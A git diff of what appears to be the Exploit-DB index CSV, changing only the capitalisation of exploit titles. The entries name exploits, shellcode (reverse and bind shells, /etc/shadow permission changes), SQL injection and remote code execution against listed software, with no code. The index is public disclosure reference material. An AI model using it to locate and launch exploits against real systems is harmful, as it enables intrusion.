+36301,platforms/php/webapps/36301.txt,"Wordpress Download Manager 2.7.2 Plugin - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 36302,platforms/php/webapps/36302.txt,"Joomla Content Component - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution",2015-03-06,Metasploit,windows,remote,5555 @@ -32740,16 +32740,16 @@ id,file,description,date,author,platform,type,port 36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 - reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 - reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting",2011-11-17,"James webb",php,webapps,0 -36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 +36317,platforms/php/webapps/36317.txt,"Wordpress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 36320,platforms/php/webapps/36320.txt,"Codoforum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 36321,platforms/php/webapps/36321.txt,"GeniXCMS 0.0.1 - Multiple Vulnerabilities",2015-03-10,LiquidWorm,php,webapps,80 36322,platforms/php/webapps/36322.txt,"Digital Attic Foundation CMS - 'id' Parameter SQL Injection",2011-11-20,tempe_mendoan,php,webapps,0 -36323,platforms/php/webapps/36323.txt,"WordPress Alert Before Your Post Plugin - 'name' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 -36324,platforms/php/webapps/36324.txt,"WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 -36325,platforms/php/webapps/36325.txt,"WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 -36326,platforms/php/webapps/36326.txt,"WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 +36323,platforms/php/webapps/36323.txt,"Wordpress Alert Before Your Post Plugin - 'name' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 +36324,platforms/php/webapps/36324.txt,"Wordpress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 +36325,platforms/php/webapps/36325.txt,"Wordpress Adminimize Plugin 1.7.21 - 'page' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 +36326,platforms/php/webapps/36326.txt,"Wordpress Lanoba Social Plugin 1.0 - 'action' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 - Kernel 'Win32k.sys' Keyboard Layout Privilege Escalation",2011-11-22,instruder,windows,local,0 36328,platforms/php/webapps/36328.txt,"TA.CMS - (TeachArabia) index.php id Parameter SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 36329,platforms/php/webapps/36329.txt,"TA.CMS - (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 @@ -32761,9 +32761,9 @@ id,file,description,date,author,platform,type,port 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 -36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 -36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 -36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36338,platforms/php/webapps/36338.txt,"Wordpress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36339,platforms/php/webapps/36339.txt,"Wordpress Featurific For Wordpress Plugin 1.6.2 - 'snum' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36340,platforms/php/webapps/36340.txt,"Wordpress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - modules/mondialrelay/googlemap.php Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 @@ -32783,11 +32783,11 @@ id,file,description,date,author,platform,type,port 36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager i 9.10 - nnm/protected/statuspoll.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager i 9.10 - nnm/protected/traceroute.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - Cross-Site Request Forgery",2015-03-11,"Luis Santana",php,webapps,0 -36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 +36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free",2015-03-12,Metasploit,windows,remote,0 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service",2011-11-25,"Houssam Sahli",windows,dos,0 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 -36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin - 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 +36363,platforms/php/webapps/36363.txt,"Wordpress Skysa App Bar Plugin - 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 @@ -32796,9 +32796,9 @@ id,file,description,date,author,platform,type,port 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)",2015-03-12,"BGA Security",xml,webapps,0 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",php,webapps,0 -36372,platforms/php/webapps/36372.txt,"WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,php,webapps,0 +36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,php,webapps,0 36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0 -36374,platforms/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 +36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0 36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request NULL Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 @@ -32806,8 +32806,8 @@ id,file,description,date,author,platform,type,port 36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php URI Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 -36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 +36382,platforms/php/webapps/36382.txt,"Wordpress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 +36383,platforms/php/webapps/36383.txt,"Wordpress flash-album-gallery Plugin - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36385,platforms/php/webapps/36385.txt,"Joomla Simple Photo Gallery 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0 @@ -32815,27 +32815,27 @@ id,file,description,date,author,platform,type,port 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash PoC",2015-03-16,"Avinash Thapa",linux,local,0 36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php' task Parameter Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0 -36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - ROT13 encoded execve(_/bin/sh_) shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - ROT13 encoded execve(_/bin/sh_) Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36392,platforms/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling",2015-03-14,"Glafkos Charalambous ",windows,dos,0 -36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Obfuscated map google.com to 127.1.1.1 shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - Obfuscated execve(_/bin/sh_) shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 - 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,php,webapps,0 -36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Obfuscated map google.com to 127.1.1.1 Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - Obfuscated execve(_/bin/sh_) Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36481,platforms/php/webapps/36481.txt,"Wordpress TheCartPress Plugin 1.6 - 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,php,webapps,0 +36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 - administrator/index.php URI Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0 -36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0 +36408,platforms/php/webapps/36408.txt,"Wordpress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe - Remote Command Execution",2015-03-16,Metasploit,windows,remote,0 -36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 Plugin - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 +36413,platforms/php/webapps/36413.txt,"Wordpress SEO by Yoast 1.7.3.3 Plugin - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 36401,platforms/php/webapps/36401.txt,"AtMail 1.04 - 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Parameter Cross-Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 - Heap Memory Corruption",2011-12-02,"High-Tech Bridge SA",windows,dos,0 36404,platforms/linux/dos/36404.c,"GNU glibc - Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,linux,dos,0 -36414,platforms/php/webapps/36414.txt,"WordPress WPML 3.1.9 Plugin - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 +36414,platforms/php/webapps/36414.txt,"Wordpress WPML 3.1.9 Plugin - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,Metasploit,java,remote,9200 36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Parameter Cross-Site Scripting",2012-01-01,Net.Edit0r,php,webapps,0 -36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 Plugin - 's' Parameter Cross-Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 +36483,platforms/php/webapps/36483.txt,"Wordpress WP Live.php 1.2.1 Plugin - 's' Parameter Cross-Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 - 'q' Parameter Cross-Site Scripting",2011-01-01,"H4ckCity Security Team",php,webapps,0 36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 - 'windowed' Parameter Cross-Site Scripting",2012-01-02,sonyy,php,webapps,0 36486,platforms/php/webapps/36486.txt,"Tienda Virtual - 'art_detalle.php' SQL Injection",2012-01-03,"Arturo Zamora",php,webapps,0 @@ -32858,7 +32858,7 @@ id,file,description,date,author,platform,type,port 36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - (.tga) Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 36432,platforms/php/webapps/36432.txt,"Pet Listing - 'preview.php' Cross-Site Scripting",2011-12-09,Mr.PaPaRoSSe,php,webapps,0 36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player - ActiveX Control 'open()' Method Stack Buffer Overflow",2011-04-20,shinnai,windows,dos,0 -36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps,0 +36434,platforms/php/webapps/36434.txt,"Wordpress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps,0 36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80 36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0 36437,platforms/windows/local/36437.rb,"Publish-It - PUI Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0 @@ -32866,10 +32866,10 @@ id,file,description,date,author,platform,type,port 36439,platforms/php/webapps/36439.txt,"Joomla ECommerce-WD Plugin 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443 -36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0 +36442,platforms/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0 36443,platforms/windows/dos/36443.txt,"Opera Web Browser Prior to 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities",2011-12-12,anonymous,windows,dos,0 -36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin - 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,php,webapps,0 -36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0 +36444,platforms/php/webapps/36444.txt,"Wordpress flash-album-gallery Plugin - 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,php,webapps,0 +36445,platforms/php/webapps/36445.txt,"Wordpress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0 36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0 36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0 36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 @@ -32890,7 +32890,7 @@ id,file,description,date,author,platform,type,port 36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,php,webapps,0 36464,platforms/php/webapps/36464.txt,"Joomla Spider FAQ Component - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 -36466,platforms/php/webapps/36466.txt,"WordPress Marketplace 2.4.0 Plugin - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 +36466,platforms/php/webapps/36466.txt,"Wordpress Marketplace 2.4.0 Plugin - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0 36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 @@ -32901,10 +32901,10 @@ id,file,description,date,author,platform,type,port 36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,hardware,remote,0 36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus - '.cfg' File Memory Corruption",2011-12-21,"Vulnerability Research Laboratory",windows,local,0 36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0 -36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,php,webapps,0 +36478,platforms/php/webapps/36478.php,"Wordpress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,php,webapps,0 36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 -36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 -36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 +36487,platforms/php/webapps/36487.txt,"Wordpress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 +36488,platforms/php/webapps/36488.txt,"Wordpress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 @@ -32952,10 +32952,10 @@ id,file,description,date,author,platform,type,port 36534,platforms/php/webapps/36534.txt,"MARINET CMS - room2.php roomid Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36535,platforms/php/webapps/36535.txt,"MARINET CMS - galleryphoto.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36536,platforms/php/webapps/36536.txt,"MARINET CMS - gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 -36537,platforms/multiple/remote/36537.txt,"SonicWall AntiSpam & EMail 7.3.1 - Multiple Security vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0 +36537,platforms/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Security vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0 36538,platforms/php/webapps/36538.txt,"Gregarius 0.6.1 - Multiple SQL Injections / Cross-Site Scripting",2012-01-09,sonyy,php,webapps,0 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 - 'users.php' Cross-Site Scripting",2012-01-09,Am!r,php,webapps,0 -36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 - 'redirect_to' Parameter URI Redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 +36540,platforms/php/webapps/36540.txt,"Wordpress Age Verification plugin 0.4 - 'redirect_to' Parameter URI Redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 - 'downloads.php' Cross-Site Scripting",2012-01-10,Am!r,php,webapps,0 36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow / Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x - Multiple Cross-Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 @@ -32969,9 +32969,9 @@ id,file,description,date,author,platform,type,port 36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 -36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 +36554,platforms/php/webapps/36554.txt,"Wordpress Plugin Slider Revolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 -36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0 +36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0 36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",linux,remote,0 @@ -32987,9 +32987,9 @@ id,file,description,date,author,platform,type,port 36573,platforms/php/webapps/36573.txt,"MMORPG Zone - 'view_news.php' SQL Injection",2012-01-18,Lazmania61,php,webapps,0 36574,platforms/php/webapps/36574.txt,"Freelance Zone - 'show_code.php' SQL Injection",2012-01-18,Lazmania61,php,webapps,0 36575,platforms/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0 -36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 Plugin - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0 +36576,platforms/php/webapps/36576.txt,"Wordpress SP Project & Document Manager 2.5.3 Plugin - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0 36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0 -36739,platforms/osx/local/36739.m,"Apple MAC OS X < 10.9/10 - Privilege Escalation",2015-04-13,mu-b,osx,local,0 +36739,platforms/osx/local/36739.m,"Apple MAC OSX < 10.9/10 - Privilege Escalation",2015-04-13,mu-b,osx,local,0 